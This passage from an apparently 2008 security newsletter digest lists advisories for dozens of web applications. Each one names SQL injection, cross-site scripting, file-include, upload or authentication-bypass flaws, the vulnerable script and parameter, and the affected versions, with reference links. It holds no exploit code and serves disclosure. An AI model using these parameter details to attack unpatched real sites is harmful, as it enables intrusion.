Vulnerabilities
Description: JaxUltraBB is a bulletin board application. The
application is exposed to multiple input validation issues. A local
file include issue affects the "user" parameter of the
"viewprofile.php" script, and a cross-site scripting issue affects the
"forum" parameter of the "viewforum.php" script. JaxUltraBB version
2.0 is affected.
Ref: http://www.securityfocus.com/bid/29853
______________________________________________________________________
08.26.37 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: PEGames Multiple Cross-Site Scripting Vulnerabilities
Description: PEGames is a CMS for gaming sites. The application is
exposed to multiple cross-site scripting issues that affect the
following parameters of the "template2.php" script: "sitetitle",
"sitenav", "sitemain" and "sitealt".
Ref: http://www.securityfocus.com/bid/29865
______________________________________________________________________
08.26.38 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: Chipmunk Blog "membername" Parameter Multiple Cross-Site
Scripting Vulnerabilities
Description: Chipmunk Blog is a PHP-based web-log application. The
application is exposed to multiple cross-site scripting issues because
it fails to sufficiently sanitize user-supplied data.
Ref: http://www.securityfocus.com/bid/29883
______________________________________________________________________
08.26.39 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: HTML Purifier CSS Multiple Cross-Site Scripting Vulnerabilities
Description: HTML Purifier is an HTML-filtering application. The
application is exposed to multiple cross-site scripting issues because
it fails to properly sanitize user-supplied input. HTML Purifier
versions prior to 2.1.5 and 3.1.1 are affected.
Ref: http://htmlpurifier.org/news.html
______________________________________________________________________
08.26.40 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: Trabajando Multiple Cross-Site Scripting Vulnerabilities
Description: Trabajando is a web application developed using Cold
Fusion. The application is exposed to multiple cross-site scripting
issues because it fails to sanitize user-supplied input.
Ref: http://www.securityfocus.com/bid/29887
______________________________________________________________________
08.26.41 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: TinX/cms Cross-Site Scripting and Local File Include
Vulnerabilities
Description: TinX/cms is a content management application. The
application is exposed to multiple input validation issues. TinX/cms
version 1.1 is affected.
Ref: http://www.securityfocus.com/bid/29907
______________________________________________________________________
08.26.42 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: MM Chat Remote File Include and Multiple Cross-Site Scripting
Vulnerabilities
Description: MM Chat is a PHP-based chat system. Since it fails to
sufficiently sanitize user-supplied input, the application is exposed
to multiple input validation issues. MM Chat version 1.5 is affected.
Ref: http://www.securityfocus.com/bid/29910
______________________________________________________________________
08.26.43 CVE: Not Available
Platform: Web Application - SQL Injection
Title: Easy Webstore "index.php" SQL Injection
Description: Easy Webstore is a PHP-based shop application. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize user-supplied data to the "cat_path" parameter
of the "index.php" script before using it in an SQL query. Easy
Webstore version 1.2 is affected.
Ref: http://www.securityfocus.com/bid/29806
______________________________________________________________________
08.26.44 CVE: Not Available
Platform: Web Application - SQL Injection
Title: KEIL Software photokorn "index.php" SQL Injection
Description: photokorn is a PHP-based photo gallery application. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize user-supplied data to the "action" parameter of
the "index.php" script before using it in an SQL query. photokorn
version 1.542 is affected.
Ref: http://www.securityfocus.com/bid/29808
______________________________________________________________________
08.26.45 CVE: Not Available
Platform: Web Application - SQL Injection
Title: Samart-cms "site.php" SQL Injection
Description: samart-cms is a web-based content management system. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize user-supplied data to the "contentsid" parameter
of the "site.php" script before using it in an SQL query. samart-cms
version 2.0 is affected.
Ref: http://www.milw0rm.com/exploits/5862
______________________________________________________________________
08.26.46 CVE: Not Available
Platform: Web Application - SQL Injection
Title: CMS-BRD "index.php" SQL Injection
Description: CMS-BRD is a web-based content management system. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize user-supplied data to the "menuclick" parameter
of the "index.php" script before using it in an SQL query.
Ref: http://www.securityfocus.com/bid/29816
______________________________________________________________________
08.26.47 CVE: Not Available
Platform: Web Application - SQL Injection
Title: TYPO3 Diocese of Portsmouth Calendar Today Extension SQL
Injection
Description: TYPO3 Diocese of Portsmouth Calendar Today extension is a
calendar extension for TYPO3. The application is exposed to an SQL
injection issue because it fails to sufficiently sanitize unspecified
input before using it in an SQL query. TYPO3 Diocese of Portsmouth
Calendar Today versions 0.0.3 and earlier are affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________
08.26.48 CVE: Not Available
Platform: Web Application - SQL Injection
Title: TYPO3 CoolURI Extension SQL Injection
Description: TYPO3 CoolURI extension is a URI modification extension
for TYPO3. The application is exposed to an SQL injection issue
because it fails to sufficiently sanitize unspecified input before
using it in an SQL query. TYPO3 CoolURI versions 1.0.11 and earlier
are affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________
08.26.49 CVE: Not Available
Platform: Web Application - SQL Injection
Title: TYPO3 Diocese of Portsmouth Training Courses Extension SQL
Injection
Description: TYPO3 Diocese of Portsmouth Training Courses extension is
a training course extension for TYPO3. The application is exposed to
an SQL injection issue because it fails to sufficiently sanitize
unspecified input before using it in an SQL query. TYPO3 Diocese of
Portsmouth Training Courses version 0.1.1 is affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________
08.26.50 CVE: Not Available
Platform: Web Application - SQL Injection
Title: TYPO3 TIMTAB - Social Bookmark Icons Extension SQL Injection
Description: TYPO3 TIMTAB - social bookmark icons extension is a
bookmarking extension for TYPO3. The application is exposed to an SQL
injection issue because it fails to sufficiently sanitize unspecified
input before using it in an SQL query. TYPO3 TIMTAB - social bookmark
icons versions 2.0 4 and earlier are affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________
08.26.51 CVE: Not Available
Platform: Web Application - SQL Injection
Title: TYPO3 Fussballtippspiel Extension SQL Injection
Description: TYPO3 Fussballtippspiel extension is an extension for
TYPO3. The application is exposed to an SQL injection issue because it
fails to sufficiently sanitize unspecified input before using it in an
SQL query. TYPO3 Fussballtippspiel versions 0.1.1 and earlier are
affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________
08.26.52 CVE: Not Available
Platform: Web Application - SQL Injection
Title: TYPO3 Download System Extension SQL Injection
Description: TYPO3 Download system is a download management extension
for TYPO3. The application is exposed to an SQL injection issue
because it fails to sufficiently sanitize unspecified input before
using it in an SQL query. TYPO3 Download system version 0.1.4 is
affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________
08.26.53 CVE: Not Available
Platform: Web Application - SQL Injection
Title: TYPO3 Random Prayer Extension SQL Injection
Description: TYPO3 Random Prayer extension is an extension for TYPO3.
The application is exposed to an SQL injection issue because it fails
to sufficiently sanitize unspecified input before using it in an
SQL query. TYPO3 Random Prayer version 0.0.1 is affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________
08.26.54 CVE: Not Available
Platform: Web Application - SQL Injection
Title: EroCMS "site" parameter SQL Injection
Description: EroCMS is a web-based content management system. The
application is exposed to an SQL injection issue because it fails to
properly sanitize the "site" parameter of the "index.php" script.
EroCMS versions 1.4 and earlier are affected.
Ref: http://www.securityfocus.com/bid/29781
______________________________________________________________________
08.26.55 CVE: Not Available
Platform: Web Application - SQL Injection
Title: TorrentTrader Classic Edition Multiple SQL Injection
Vulnerabilities
Description: TorrentTrader Classic Edition is a PHP-based torrent
tracker. The application is exposed to multiple SQL injection issues
because it fails to sufficiently sanitize user-supplied input.
TorrentTrader versions 1.08 Classic Edition is affected.
Ref: http://www.securityfocus.com/archive/1/493434
______________________________________________________________________
08.26.56 CVE: Not Available
Platform: Web Application - SQL Injection
Title: MyBizz-Classifieds "index.php" SQL Injection
Description: MyBizz-Classifieds is a classified-ads application. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize user-supplied data to the "cat" parameter of the
"index.php" script before using it in an SQL query.
Ref: http://www.securityfocus.com/bid/29798
______________________________________________________________________
08.26.57 CVE: Not Available
Platform: Web Application - SQL Injection
Title: MaxTrade Trade Module SQL Injection
Description: MaxTrade is a web-based content management system. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize user-supplied data to the "categori" parameter
of the "Trade" module before using it in an SQL query. MaxTrade
version 1.3.23 is affected.
Ref: http://www.securityfocus.com/bid/29799
______________________________________________________________________
08.26.58 CVE: Not Available
Platform: Web Application - SQL Injection
Title: BoatScripts Classifieds "type" Parameter SQL Injection
Description: BoatScripts Classifieds is a web-based application
implemented in PHP. The application is exposed to an SQL injection
issue because it fails to sufficiently sanitize user-supplied data to
the "type" parameter of the "index.php" script before using it in an
SQL query.
Ref: http://www.securityfocus.com/bid/29801
______________________________________________________________________
08.26.59 CVE: Not Available
Platform: Web Application - SQL Injection
Title: Carscripts Classifieds "index.php" SQL Injection
Description: Carscripts Classifieds is a classified-ads application.
The application is exposed to an SQL injection issue because it fails
to sufficiently sanitize user-supplied data to the "cat" parameter of
the "index.php" script before using it in an SQL query.
Ref: http://www.securityfocus.com/bid/29803
______________________________________________________________________
08.26.60 CVE: Not Available
Platform: Web Application - SQL Injection
Title: CaupoShop "csc_article_details.php" SQL Injection
Description: CaupoShop is a PHP-based ecommerce application. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize user-supplied data to the "saArticle[ID]"
parameter of the "csc_article_details.php" script before using it in
an SQL query. CaupoShop Classic version 1.3 is affected.
Ref: http://www.securityfocus.com/bid/29834
______________________________________________________________________
08.26.61 CVE: Not Available
Platform: Web Application - SQL Injection
Title: AJ Auction Pro "cate_id" Parameter SQL Injection
Description: AJ Auction Pro is a web-based application. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize user-supplied data to the "cate_id" parameter of
the "category.php" module before using it in an SQL query. AJ Auction
Pro, web version 2.0 is affected.
Ref: http://www.securityfocus.com/bid/29839
______________________________________________________________________
08.26.62 CVE: Not Available
Platform: Web Application - SQL Injection
Title: AJ Auction "id" Parameter SQL Injection
Description: AJ Auction is a web-based application implemented in PHP.
The application is exposed to an SQL injection issue because it fails
to sufficiently sanitize user-supplied data to the "id" parameter of
the "index.php" module before using it in an SQL query. AJ Auction
version 1.0 is affected.
Ref: http://www.securityfocus.com/bid/29840
______________________________________________________________________
08.26.63 CVE: Not Available
Platform: Web Application - SQL Injection
Title: CiBlog "links-extern.php" SQL Injection
Description: CiBlog is a blog application. The application is exposed
to an SQL injection issue because it fails to sufficiently sanitize
user-supplied data to the "id" parameter of the "links-extern.php"
script before using it in an SQL query. CiBlog version 3.1 is
affected.
Ref: http://www.securityfocus.com/bid/29852
______________________________________________________________________
08.26.64 CVE: Not Available
Platform: Web Application - SQL Injection
Title: emuCMS "index.php" SQL Injection
Description: emuCMS is a web-based content management system. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize input to the "cat_id" parameter of "index.php"
before using it in an SQL query. emuCMS version 0.3 is affected.
Ref: http://www.securityfocus.com/bid/29855
______________________________________________________________________
08.26.65 CVE: Not Available
Platform: Web Application - SQL Injection
Title: PHPAuction "profile.php" SQL Injection
Description: PHPAuction is a web-based auction site. The application
is exposed to an SQL injection issue because it fails to sufficiently
sanitize input to the "auction_id" parameter of "profile.php" before
using it in an SQL query.
Ref: http://www.securityfocus.com/bid/29856
______________________________________________________________________
08.26.66 CVE: Not Available
Platform: Web Application - SQL Injection
Title: Ektron CMS400.NET "ContentRatingGraph.aspx" SQL Injection
Description: CMS400.NET is a web-based content management system. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize input to the "res" parameter of
"ContentRatingGraph.aspx" before using it in an SQL query. CMS400.NET
versions 7.5.2 and earlier are affected.
Ref:
http://www.digitrustgroup.com/advisories/web-application-security-ektron.html
______________________________________________________________________
08.26.67 CVE: Not Available
Platform: Web Application - SQL Injection
Title: CMS Multiple SQL Injection Vulnerabilities
Description: CMS is a web-based content management system. The
application is exposed to multiple SQL injection issues because it
fails to sufficiently sanitize user-supplied input to the following
scripts and parameters: "readarticle.php: article_id" and
"articles.php: cat_id". CMS version 2.1.1 is affected.
Ref: http://www.milw0rm.com/exploits/5881
______________________________________________________________________
08.26.68 CVE: Not Available
Platform: Web Application - SQL Injection
Title: KbLance.com "index.php" SQL Injection
Description: KbLance.com is web-based knowledge base software. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize input to the "cat_id" parameter of "index.php"
before using it in an SQL query.
Ref: http://www.securityfocus.com/bid/29859
______________________________________________________________________
08.26.69 CVE: Not Available
Platform: Web Application - SQL Injection
Title: Online Fantasy Football League Multiple SQL Injection
Vulnerabilities
Description: Online Fantasy Football League is a web-based
application. The application is exposed to multiple SQL injection
issues because it fails to sufficiently sanitize user-supplied input.
Online Fantasy Football League versions 0.2.6 and earlier are
affected.
Ref: http://www.securityfocus.com/bid/29861
______________________________________________________________________
08.26.70 CVE: Not Available
Platform: Web Application - SQL Injection
Title: Scientific Image DataBase "projects.php" SQL Injection
Description: Scientific Image DataBase is a web-based application. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize input to the "id" parameter of "projects.php"
before using it in an SQL query. Scientific Image DataBase versions
0.41 and earlier are affected.
Ref: http://www.securityfocus.com/bid/29862
______________________________________________________________________
08.26.71 CVE: Not Available
Platform: Web Application - SQL Injection
Title: AJ HYIP Acme "news.php" SQL Injection
Description: AJ HYIP Acme is an HYIP manager. The application is
exposed to an SQL injection issue because it fails to sufficiently
sanitize user-supplied data to the "id" parameter of the "news.php"
script before using it in an SQL query.
Ref: http://www.securityfocus.com/bid/29863
______________________________________________________________________
08.26.72 CVE: Not Available
Platform: Web Application - SQL Injection
Title: phpAuction "item.php" SQL Injection
Description: phpAuction is web-based auction software. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize input to the "id" parameter of "item.php" before
using it in an SQL query. phpAuction version 3.2 is affected.
Ref: http://www.securityfocus.com/bid/29864
______________________________________________________________________
08.26.73 CVE: Not Available
Platform: Web Application - SQL Injection
Title: EXP Shop Joomla! "com_expshop" Component SQL Injection
Description: EXP Shop is a component for Joomla! CMS that provides
ecommerce functionality. The application is exposed to an SQL
injection issue because it fails to sufficiently sanitize
user-supplied data to the "catid" parameter of the "com_expshop"
component before using it in an SQL query. EXP Shop version 1.0 is
affected.
Ref: http://www.securityfocus.com/bid/29869
______________________________________________________________________
08.26.74 CVE: Not Available
Platform: Web Application - SQL Injection
Title: PageSquid CMS "index.php" SQL Injection
Description: PageSquid CMS is a web-based content management system.
The application is exposed to an SQL injection issue because it fails
to sufficiently sanitize input to the "page" parameter of "index.php"
before using it in an SQL query. PageSquid CMS version 0.3 Beta is
affected.
Ref: http://www.securityfocus.com/bid/29870
______________________________________________________________________
08.26.75 CVE: Not Available
Platform: Web Application - SQL Injection
Title: sHibby sHop "default.asp" SQL Injection
Description: sHibby sHop is a web-based application implemented in
ASP. The application is exposed to an SQL injection issue because it
fails to sufficiently sanitize input to the "sayfa" parameter of
"default.asp" before using it in an SQL query. sHibby sHop version 2.2
is affected.
Ref: http://www.securityfocus.com/bid/29875
______________________________________________________________________
08.26.76 CVE: Not Available
Platform: Web Application - SQL Injection
Title: CCleague Pro "u" Cookie Parameter SQL Injection
Description: CCleague Pro is a web-based application for managing
sports teams. The application is exposed to an SQL injection issue
because it fails to sufficiently sanitize input to the "u" cookie
parameter before using it in an SQL query. CCleague Pro versions 1.2
and earlier are affected.
Ref: http://www.securityfocus.com/bid/29876
______________________________________________________________________
08.26.77 CVE: Not Available
Platform: Web Application - SQL Injection
Title: IGSuite "formid" Parameter SQL Injection
Description: IGSuite is a groupware application. It is available for
Linux and Windows platforms. The application is exposed to an SQL
injection issue because it fails to sufficiently sanitize input to the
"formid" parameter of "cgi-bin/igsuite" script before using it in an
SQL query. IGSuite version 3.2.4 is affected.
Ref: http://www.securityfocus.com/bid/29879
______________________________________________________________________
08.26.78 CVE: Not Available
Platform: Web Application - SQL Injection
Title: HoMaP-CMS "index.php" SQL Injection
Description: HoMaP-CMS is a content manager. The application is
exposed to an SQL injection issue because it fails to sufficiently
sanitize input to the "go" parameter of the "index.php" script before
using it in an SQL query.
Ref: http://www.securityfocus.com/bid/29897
______________________________________________________________________
08.26.79 CVE: Not Available
Platform: Web Application - SQL Injection
Title: Relative Real Estate Systems "listing_id" Parameter SQL
Injection
Description: Relative Real Estate Systems is a web-based, real estate
application. The application is exposed to an SQL injection issue
because it fails to sufficiently sanitize input to the "listing_id"
parameter of the "index.php" script when the "go" parameter is set to
"listing". Relative Real Estate Systems version 3.0 is affected.
Ref: http://www.securityfocus.com/bid/29915
______________________________________________________________________
08.26.80 CVE: Not Available
Platform: Web Application - SQL Injection
Title: ShareCMS Multiple SQL Injection Vulnerabilities
Description: ShareCMS is a content management system. The application
is exposed to multiple SQL injection issues because it fails to
sufficiently sanitize user-supplied input. ShareCMS version 0.1 Beta
is affected.
Ref: http://www.securityfocus.com/bid/29916
______________________________________________________________________
08.26.81 CVE: Not Available
Platform: Web Application - SQL Injection
Title: DUcalendar "detail.asp" SQL Injection
Description: DUcalendar is an event calendar application implemented
in ASP. The application is exposed to an SQL injection issue because
it fails to sufficiently sanitize user-supplied data to the "iEve"
parameter of the "detail.asp" script. DUcalendar version 1.0 is
affected.
Ref: http://www.securityfocus.com/bid/29919
______________________________________________________________________
08.26.82 CVE: Not Available
Platform: Web Application
Title: nweb2fax Multiple Remote Vulnerabilities
Description: nweb2fax is a PHP-based application for sending faxes.
The application is exposed to multiple remote issues, including
command execution and directory traversal issues, because the
application fails to properly sanitize user-supplied input. nweb2fax
versions 0.2.7 and earlier are affected.
Ref: http://www.securityfocus.com/bid/29804
______________________________________________________________________
08.26.83 CVE: Not Available
Platform: Web Application
Title: Drupal TrailScout Module SQL Injection and HTML Injection
Vulnerabilities
Description: TrailScout is a module for Drupal to display last visited
pages as breadcrumbs. TrailScout is exposed to multiple
input validation issues because it fails to adequately sanitize
user-supplied input. TrailScout versions prior to 5.x-1.4 are
affected.
Ref: http://drupal.org/node/272191
______________________________________________________________________
08.26.84 CVE: Not Available
Platform: Web Application
Title: eLineStudio Site Composer Multiple Input Validation and
Unauthorized Access Vulnerabilities
Description: eLineStudio Site Composer is a content manager. The
application is exposed to multiple input validation issues.
eLineStudio Site Composer version 2.6 is affected.
Ref: http://www.securityfocus.com/archive/1/493473
______________________________________________________________________
08.26.85 CVE: Not Available
Platform: Web Application
Title: Academic Web Tools CMS 1.4.2.8 Multiple Input Validation
Vulnerabilities
Description: Academic Web Tools CMS is content management system. The
application is exposed to multiple input validation issues. Academic
Web Tools CMS version 1.4.2.8 is affected.
Ref: http://www.securityfocus.com/archive/1/493472
______________________________________________________________________
08.26.86 CVE: Not Available
Platform: Web Application
Title: OwnRS "clanek.php" Multiple Input Validation Vulnerabilities
Description: OwnRS is a content manager. Since it fails to adequately
sanitize user-supplied data, the application is exposed to multiple
input validation issues affecting the "id" parameter of the
"clanek.php" script. OwnRS beta version 3 is affected.
Ref: http://www.securityfocus.com/bid/29818
______________________________________________________________________
08.26.87 CVE: Not Available
Platform: Web Application
Title: Orlando CMS classes "GLOBALS["preloc"]" Parameter Multiple
Remote File Include Vulnerabilities
Description: Orlando CMS classes is a set of PHP classes for building
content managers. The application is exposed to multiple remote file
include issues because it fails to sufficiently sanitize user-supplied
input to the "GLOBALS["preloc"]" parameter of the
"/modules/core/logger/init.php" and "/AJAX/newscat.php" scripts.
Orlando CMS classes version 0.6 is affected.
Ref: http://www.securityfocus.com/bid/29820
______________________________________________________________________
08.26.88 CVE: Not Available
Platform: Web Application
Title: TYPO3 TARGET-E WorldCup Bets Extension Multiple Unspecified
Input Validation Vulnerabilities
Description: The TARGET-E WorldCup Bets is a web-based betting
application extension for TYPO3. The extension is exposed to multiple
input validation issues because it fails to adequately sanitize
user-supplied data. These issues include unspecified cross-site
scripting and SQL injection vulnerabilities. TARGET-E WorldCup Bets
version 2.0.0 is affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________
08.26.89 CVE: Not Available
Platform: Web Application
Title: WebCalendar "tools/send_reminders.php" Remote File Include
Description: WebCalendar is a web-based calendar application. The
application is exposed to a remote file include issue because it fails
to sufficiently sanitize user-supplied input to the "includedir"
parameter of the "tools/send_reminders.php" script. WebCalendar
version 1.0.4 is affected.
Ref: http://www.securityfocus.com/bid/29783
______________________________________________________________________
08.26.90 CVE: Not Available
Platform: Web Application
Title: ManageEngine OpUtils "hostName" HTML Injection
Description: ManageEngine OpUtils is a web-based network management
application. The application is exposed to an HTML injection issue
because it fails to sanitize user-supplied input to the "hostName"
parameter of the "MainLayout.do" script. ManageEngine OpUtils version
5 is affected.
Ref: http://www.securityfocus.com/bid/29785
______________________________________________________________________
08.26.91 CVE: CVE-2008-2557
Platform: Web Application
Title: CRE Loaded Multiple HTML Injection Vulnerabilities
Description: CRE Loaded is a web-based ecommerce application. The
application is exposed to multiple unspecified HTML injection issues
that affect the "Links" and "Links Submit" pages because it fails to
sufficiently sanitize user-supplied data. CRE Loaded versions 6.2.13.1
and earlier are affected.
Ref: http://oscommerceuniversity.com/lounge/index.php?topic=249.0
______________________________________________________________________
08.26.92 CVE: Not Available
Platform: Web Application
Title: Exero CMS "theme" Parameter Multiple Local File Include
Vulnerabilities
Description: Exero CMS is a content management system. The application
is exposed to local file include issues because it fails to properly
sanitize user-supplied input. Exero CMS versions 1.0.0 and 1.0.1 are
affected.
Ref: http://sourceforge.net/project/shownotes.php?release_id=607502
______________________________________________________________________
08.26.93 CVE: Not Available
Platform: Web Application
Title: doITlive CMS Multiple SQL Injection and Cross-Site Scripting
Vulnerabilities
Description: doITlive CMS is a content manager implemented in ASP. The
application is exposed to multiple input validation issues because it
fails to adequately sanitize user-supplied data. doITlive CMS version
2.50 is affected.
Ref: http://www.securityfocus.com/bid/29789
______________________________________________________________________
08.26.94 CVE: Not Available
Platform: Web Application
Title: aspWebCalendar "calendar_admin.asp" Arbitrary File Upload
Description: aspWebCalendar is a web-based scheduling application
implemented in ASP. The application is exposed to an issue that lets
remote attackers upload and execute arbitrary script code on an
affected computer with the privileges of the web server process. The
issue occurs because the software fails to properly sanitize
user-supplied input in the form of file extensions to the
"calendar_admin.asp" script. aspWebCalendar 2008 is affected.
Ref: http://www.securityfocus.com/bid/29795
______________________________________________________________________
08.26.95 CVE: Not Available
Platform: Web Application
Title: TYPO3 nepa-design.de Spam Protection Extension Unspecified
Setting Manipulation
Description: nepa-design.de Spam Protection is an extension for TYPO3
that is designed to mitigate spam email. The extension is exposed to
an issue that results in the manipulation of external settings.
nepa-design.de Spam Protection version 0.1.3 is affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________
08.26.96 CVE: Not Available
Platform: Web Application
Title: TYPO3 Frontend Filemanager Extension Unspecified Code Execution
Description: The Frontend Filemanager extension adds file management
capabilities to TYPO3. The application is exposed to an unspecified
code execution issue. Frontend Filemanager versions prior to 0.6.2 are
affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________
08.26.97 CVE: Not Available
Platform: Web Application
Title: Lotus Core CMS "phpbb_root_path" Parameter Multiple Remote File
Include Vulnerabilities
Description: Lotus Core CMS is an application to create web sites. The
application is exposed to multiple remote file include issues because
it fails to sufficiently sanitize user-supplied input to the
"phpbb_root_path" parameter of the "system/plugins/index.php" and
"system/plugins/error/404.php" scripts. Lotus Core CMS version 1.0.1
is affected.
Ref: http://www.securityfocus.com/bid/29838
______________________________________________________________________
08.26.98 CVE: Not Available
Platform: Web Application
Title: EZTechhelp Company EZCMS Multiple Unspecified Vulnerabilities
Description: EZCMS is a PHP-based content manager. The application is
exposed to multiple issues including an SQL injection issue and
unspecified issues affecting the application's "News manager",
"Calendar", and "Contact form manager". EZCMS versions 1.2 and earlier
are affected.
Ref: http://ezcms.eztechhelp.com/index.php?page=3&nid=27
______________________________________________________________________
08.26.99 CVE: Not Available
Platform: Web Application
Title: Virtual Support Office-XP Multiple Remote Vulnerabilities
Description: Virtual Support Office-XP is a web-based help desk
application implemented in ASP. The application is exposed to
multiple remote issues. Virtual Support Office-XP versions 3.0.29 and
3.0.27 are affected.
Ref: http://www.securityfocus.com/bid/29841
______________________________________________________________________
08.26.100 CVE: Not Available
Platform: Web Application
Title: FireAnt "index.php" Local File Include
Description: FireAnt is a PHP-based media player designed for internet
TV. The application is exposed to a local file include issue because
it fails to properly sanitize user-supplied input to the "page"
parameter of the "index.php" script. FireAnt version 1.3 is affected.
Ref: http://www.securityfocus.com/bid/29843
______________________________________________________________________
08.26.101 CVE: Not Available
Platform: Web Application
Title: IPTBB "act" Parameter Local File Include
Description: IPTBB is a web-based bulletin board application. The
application is exposed to a local file include issue because it fails
to properly sanitize user-supplied input to the "act" parameter of the
"index.php" script. IPTBB version 0.5.6 is affected.
Ref: http://www.securityfocus.com/bid/29845
______________________________________________________________________
08.26.102 CVE: Not Available
Platform: Web Application
Title: FubarForum "index.php" Local File Include
Description: FubarForum is a PHP-based web forum application. The
application is exposed to a local file include issue because it fails
to properly sanitize user-supplied input to the "page" parameter of
the "index.php" script. FubarForum version 1.5 is affected.
Ref: http://www.securityfocus.com/bid/29847
______________________________________________________________________
08.26.103 CVE: Not Available
Platform: Web Application
Title: Lightweight News Portal Multiple Input Validation and
Authentication Bypass Vulnerabilities
Description: Lightweight news portal is a PHP-based content manager.
The application is exposed to multiple issues. Attackers can leverage
these issues to have arbitrary HTML or script code execute in the
context of the affected site, or access certain administrative
functions. Lightweight news portal version 1.0b is affected.
Ref: http://www.securityfocus.com/bid/29848
______________________________________________________________________
08.26.104 CVE: Not Available
Platform: Web Application
Title: Diigo Toolbar and Diigolet Comment Feature HTML Injection and
Information Disclosure Vulnerabilities
Description: Diigo Toolbar and Diigolet are browser plugins for
Firefox and Internet Explorer. The plugins interface with the Diigo
social networking service. The plugins are exposed to a cross-site
scripting issue and an information disclosure issue. The
HTML injection issue occurs because Diigo Toolbar fails to adequately
sanitize user-supplied input to the shared comment feature.
Ref: http://www.securityfocus.com/archive/1/493531
______________________________________________________________________
08.26.105 CVE: Not Available
Platform: Web Application
Title: Jamroom "purchase.php" Remote File Include
Description: Jamroom is a web-based content management system for
artists. The application is exposed to a remote file include issue
because it fails to sufficiently sanitize user-supplied input to the
"jamroom[jm_dir]" parameter of the
"include/plugins/jrBrowser/purchase.php" script. Jamroom version 3.3.5
is affected.
Ref: http://www.securityfocus.com/bid/29854
______________________________________________________________________
08.26.106 CVE: Not Available
Platform: Web Application
Title: Aprox CMS Engine "index.php" Local File Include
Description: Aprox CMS Engine is a content management system. The
application is exposed to a local file include issue because it fails
to properly sanitize user-supplied input to the "page" parameter of
the "index.php" script. Aprox CMS Engine version 5.1.0.4 is affected.
Ref: http://www.securityfocus.com/bid/29860
______________________________________________________________________
08.26.107 CVE: Not Available
Platform: Web Application
Title: IDMOS "site_absolute_path" Parameter Multiple Remote File
Include Vulnerabilities
Description: IDMOS is a PHP-based content manager. The application is
exposed to multiple remote file include issues because it fails to
sufficiently sanitize user-supplied input. IDMOS version 1.0 is
affected.
Ref: http://www.securityfocus.com/bid/29868
______________________________________________________________________
08.26.108 CVE: Not Available
Platform: Web Application
Title: le.cms "admin/upload.php" Arbitrary File Upload
Description: le.cms is a PHP-based content manager. The application is
exposed to an issue that lets remote attackers upload and execute
arbitrary script code on an affected computer with the privileges of
the web server process. The issue occurs because the software fails to
properly sanitize user-supplied input containing file extensions to
the "admin/upload.php" script. le.cms versions 1.4 and earlier are
affected.
Ref: http://www.securityfocus.com/bid/29867
______________________________________________________________________
08.26.109 CVE: Not Available
Platform: Web Application
Title: CCleague Pro "type" Cookie Parameter Authentication Bypass
Description: CCleague Pro is a web-based application for managing
sports teams. The application is exposed to an authentication bypass
issue because it fails to adequately verify user-supplied input used
for cookie-based authentication. CCleague Pro versions 1.2 and earlier
are affected.
Ref: http://www.securityfocus.com/bid/29871
______________________________________________________________________
08.26.110 CVE: Not Available
Platform: Web Application
Title: le.cms "submit0" Parameter Authentication Bypass
Description: le.cms is a PHP-based content manager. The application is
exposed to an authentication bypass issue because it fails to
adequately verify user-supplied input. le.cms versions 1.4 and earlier
are affected.
Ref: http://www.securityfocus.com/bid/29872
______________________________________________________________________
08.26.111 CVE: Not Available
Platform: Web Application
Title: RSS-aggregator "display.php" Remote File Include
Description: RSS-aggregator is a web-based application that is used to
display several different RSS feeds on a Web page. The application is
exposed to a remote file include issue because it fails to
sufficiently sanitize user-supplied input to the "path" parameter of
the "display.php" script.
Ref: http://www.securityfocus.com/bid/29873
______________________________________________________________________
08.26.112 CVE: Not Available
Platform: Web Application
Title: MiGCMS Multiple Remote File Include Vulnerabilities
Description: MiGCMS is a PHP-based content manager. The application is
exposed to multiple remote file include issues because it fails to
sufficiently sanitize user-supplied input to the
"GLOBALS[application][app_root]" parameter of the following scripts:
"collection.class.php" and "content_image.class.php". MiGCMS version
2.0.5 is affected.
Ref: http://www.securityfocus.com/bid/29874
______________________________________________________________________
08.26.113 CVE: Not Available
Platform: Web Application
Title: HoMaP "plugin_admin.php" Remote File Include
Description: HoMaP is a web-based content management system. The
application is exposed to a remote file include issue because it fails
to sufficiently sanitize user-supplied input to the
"_settings[pluginpath]" parameter of the "plugin_admin.php" script.
HoMaP version 0.1 is affected.
Ref: http://www.securityfocus.com/bid/29877
______________________________________________________________________
08.26.114 CVE: Not Available
Platform: Web Application
Title: phpDMCA Multiple Remote File Include Vulnerabilities
Description: phpDMCA is a PHP-based content manager. The application
is exposed to multiple remote file include issues because it fails to
sufficiently sanitize user-supplied input to the "ourlinux_root_path"
parameter of the following scripts: "adodb-errorpear.inc.php" and
